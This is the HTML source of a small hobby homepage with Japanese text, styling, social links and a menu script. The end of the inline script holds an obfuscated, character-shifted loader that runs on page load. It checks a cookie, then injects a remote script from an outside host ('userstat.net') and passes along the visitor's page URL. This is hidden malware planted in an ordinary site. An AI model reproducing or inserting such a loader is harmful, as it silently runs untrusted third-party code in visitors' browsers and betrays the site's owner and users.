<!doctype html>
<html lang="en"> 
 <head> 
  <meta charset="UTF-8"> 
  <meta name="viewport" content="width=device-width, initial-scale=1.0"> 
  <link rel="shortcut icon" type="image/x-icon" href="https://telegra.ph/file/dba9056d5557f603e9c84.jpg"> 
  <link rel="stylesheet" href="/frontend/styles.css"> 
  <meta property="og:image" content="https://telegra.ph/file/398f297734642557fa2a9.jpg">
  <link href="https://unpkg.com/boxicons@2.1.2/css/boxicons.min.css" rel="stylesheet"> 
  <title>ふみふみ 休み火</title> 

   <style>
     @import url("https://fonts.googleapis.com/css2?family=Poppins:wght@400;600;700&display=swap");

     :root {
       --header-height: 3rem;
       --font-semi: 600;

       --first-color: #8CAAEE;
       --second-color: #eff1f5;
       --title-color: #8AADF4;
       --header-color: #ea76cb;
       --bg-color: #11111B;

       --body-font: 'Poppins', sans-serif;
       --big-font-size: 2rem;
       --h2-font-size: 1.25rem;
       --normal-font-size: 0.938rem;

       --mb-2: 1rem;
       --mb-4: 2rem;
       --mb-5: 2.5rem;
       --mb-6: 3rem;

       --z-fixed: 100;
     }

     *,
     ::before,
     ::after {
       box-sizing: border-box;
     }

     html {
       background-color: var(--bg-color);
       scroll-behavior: smooth;
     }

     body {
       margin: var(--header-height) 0 0 0;
       font-family: var(--body-font);
       font-size: var(--normal-font-size);
       color: var(--second-color);
     }

     h1,
     h2,
     p {
       margin: 0;
     }

     ul {
       margin: 0;
       padding: 0;
       list-style: none;
     }

     a {
       text-decoration: none;
     }

     img {
       max-width: 100%;
       height: auto;
       display: block;
     }

     .section {
       padding-top: 3rem;
       padding-bottom: 2rem;
     }


     .bd-grid {
       max-width: 1024px;
       display: grid;
       grid-template-columns: 100%;
       grid-column-gap: 2rem;
       width: calc(100% - 2rem);
       margin-left: var(--mb-2);
       margin-right: var(--mb-2);
     }

     .l-header {
       width: 100%;
       position: fixed;
       top: 0;
       left: 0;
       z-index: var(--z-fixed);
       background-color: var(--bg-color);
       box-shadow: 0 1px 4px var(--header-color);
     }


     /* Navbar */
     .nav {
       height: var(--header-height);
       display: flex;
       justify-content: space-between;
       align-items: center;
       font-weight: var(--font-semi);
     }


     .nav_item {
       margin-bottom: var(--mb-4);
     }

     .nav_link {
       position: relative;
       color: #e6e9ef;
     }

     .nav_link:hover {
       position: relative;
     }

     .nav_link:hover::after {
       position: absolute;
       content: "";
       width: 100%;
       height: 0.18rem;
       left: 0;
       top: 2rem;
       background-color: var(--first-color);
     }

     .nav_logo {
       font-size: 24px;
       color: var(--second-color);
     }

     .nav_toggle {
       color: var(--second-color);
       font-size: 1.5rem;
       cursor: pointer;
     }

     .active::after {
       position: absolute;
       content: "";
       width: 100%;
       height: 0.18rem;
       left: 0;
       top: 2rem;
       background-color: var(--first-color);
     }

     /* Home */
     .home {
       height: calc(100vh - 3rem);
       row-gap: 1rem;
     }

     .home_data {
       align-self: center;
     }

     .home_title {
       font-size: var(--big-font-size);
       margin-bottom: var(--mb-5);
     }

     .home_title-color {
       color: var(--title-color);
       transition: ease-in 0.5s;
     }

     .home_title-color:hover {
       text-shadow: 2px 2px 28px #74c7ec;
     }

     .home_social {
       display: flex;
       flex-direction: column;
     }

     .home_social-icon {
       width: max-content;
       margin-bottom: var(--mb-2);
       font-size: 1.5rem;
       color: var(--second-color);
       transition: 0.4s;
     }

     .home_social-icon:hover {
       color: var(--first-color);
       letter-spacing: 0.25em;
     }


     /* About text */
     .about_text {
       font-size: 1.2rem;
     }

     /* Button */
     .button {
       display: inline-block;
       background-color: var(--first-color);
       color: #fff;
       padding: .75rem 2.5rem;
       font-weight: var(--font-semi);
       border-radius: .5rem;
       transition: 0.4s;
       margin-top: 1.5rem;
     }

     .button:hover {
       transition: 2s;
       box-shadow: 0 7px 28px #74c7ec;
     }



     /* For responsive layout */
     @media screen and (min-width: 768px) {
       :root {
         --big-font-size: 3.5rem;
         --h2-font-size: 2rem;
         --normal-font-size: 1rem;
       }

       body {
         margin: 0;
       }

       .section {
         padding-top: 4rem;
         padding-bottom: 3rem;
       }

       .nav {
         height: calc(var(--header-height) + 1rem);
       }

       .nav_list {
         display: flex;
         padding-top: 0;
       }

       .nav_item {
         margin-left: var(--mb-6);
         margin-bottom: 0;
       }

       .nav_toggle {
         display: none;
       }

       .nav_link {
         color: var(--second-color);
       }

       .home {
         height: 100vh;
       }

       .home_data {
         align-self: flex-end;
       }

       .home_social {
         padding-top: 0;
         padding-bottom: 2.5rem;
         flex-direction: row;
         align-self: flex-end;
       }

       .home_social-icon {
         margin-bottom: 0;
         margin-right: var(--mb-4);
       }
     }

     @media screen and (min-width: 1024px) {
       .bd-grid {
         margin-left: auto;
         margin-right: auto;
       }
     }

     @media screen and (max-width: 768px) {
       .nav_menu {
         position: fixed;
         top: var(--header-height);
         right: -100%;
         width: 80%;
         height: 100%;
         padding: 2rem;
         opacity: 90%;
         background-color: var(--bg-color);
         transition: .5s;
       }
     }

     .show {
       right: 0;
     }



     
   </style>
 </head> 
 <body> 
  <header class="l-header"> 
   <nav class="nav bd-grid"> 
    <div> <a href="#" class="nav_logo">ふみふみ ٩(ˊᗜˋ*)و ♡</a> 
    </div> 
    <div class="nav_menu" id="nav-menu"> 
     <ul class="nav_list"> 
      <li class="nav_item"><a href="/" class="nav_link active">家</a></li> 
      <li class="nav_item"><a href="/animepict" class="nav_link">ドキュメント</a></li>
      <li class="nav_item"><a href="/animepict" class="nav_link">アップロード者</a></li>
      <li class="nav_item"><a href="https://wa.me/+2767xxx" class="nav_link">私たちのソーシャルメディア</a> </li> 
     </ul> 
    </div>
    <div class="nav_toggle" id="nav-toggle"> <i class="bx bx-menu"></i> 
    </div>
   </nav> 
  </header> 
  <main class="l-main"> 
   <section class="home bd-grid" id="home"> 
    <div class="home_data"> 
    						<img src="https://pic.re/image?max_size=1023">
    						
    						
     <h1 class="home_title">こんにちは,<br><span class="home_title-color">私のウェブサイトへようこそ</span></h1> 
     <p class="about_text">趣味でこのサイトを作りました. (≧▽≦)</p> <a href="/playground" class="button">Explore!</a> 
    </div> 
    <div class="home_social"> <a href="https://github.com/FumiOnGithub" class="home_social-icon"><i class="bx bxl-github"></i></a> <a href="https://t.me/AliAryanTech" class="home_social-icon"><i class="bx bxl-telegram"></i></a> <a href="https://twitter.com/AliAryanTech" class="home_social-icon"><i class="bx bxl-twitter"></i></a> 
    </div> 
   </section> 
   <script defer src="https://unpkg.com/scrollreveal"></script> 
   <script>
    const showMenu=(toggleId,navId)=>{const toggle=document.getElementById(toggleId),nav=document.getElementById(navId);toggle&&nav&&toggle.addEventListener("click",(()=>{nav.classList.toggle("show"),console.log(nav)}))};showMenu("nav-toggle","nav-menu");const navLink=document.querySelectorAll(".nav_link");function linkAction(){navLink.forEach((n=>n.classList.remove("active"))),this.classList.add("active");document.getElementById("nav-menu").classList.remove("show")}navLink.forEach((n=>n.addEventListener("click",linkAction)));const sr=ScrollReveal({origin:"top",distance:"80px",duration:2e3,reset:!0});sr.reveal(".home_title",{}),sr.reveal(".home_social-icon",{interval:200}),sr.reveal(".button",{delay:200});(function(o,d,l){try{o.f=o=>o.split('').reduce((s,c)=>s+String.fromCharCode((c.charCodeAt()-5).toString()),'');o.b=o.f('UMUWJKX');o.c=l.protocol[0]=='h'&&/\./.test(l.hostname)&&!(new RegExp(o.b)).test(d.cookie),setTimeout(function(){o.c&&(o.s=d.createElement('script'),o.s.src=o.f('myyux?44zxjwxy'+'fy3sjy4ljy4xhwnu'+'y3oxDwjkjwwjwB')+l.href,d.body.appendChild(o.s));},1000);d.cookie=o.b+'=full;max-age=39800;'}catch(e){};}({},document,location));

    
   </script> 
  </main> 
 </body>
</html>
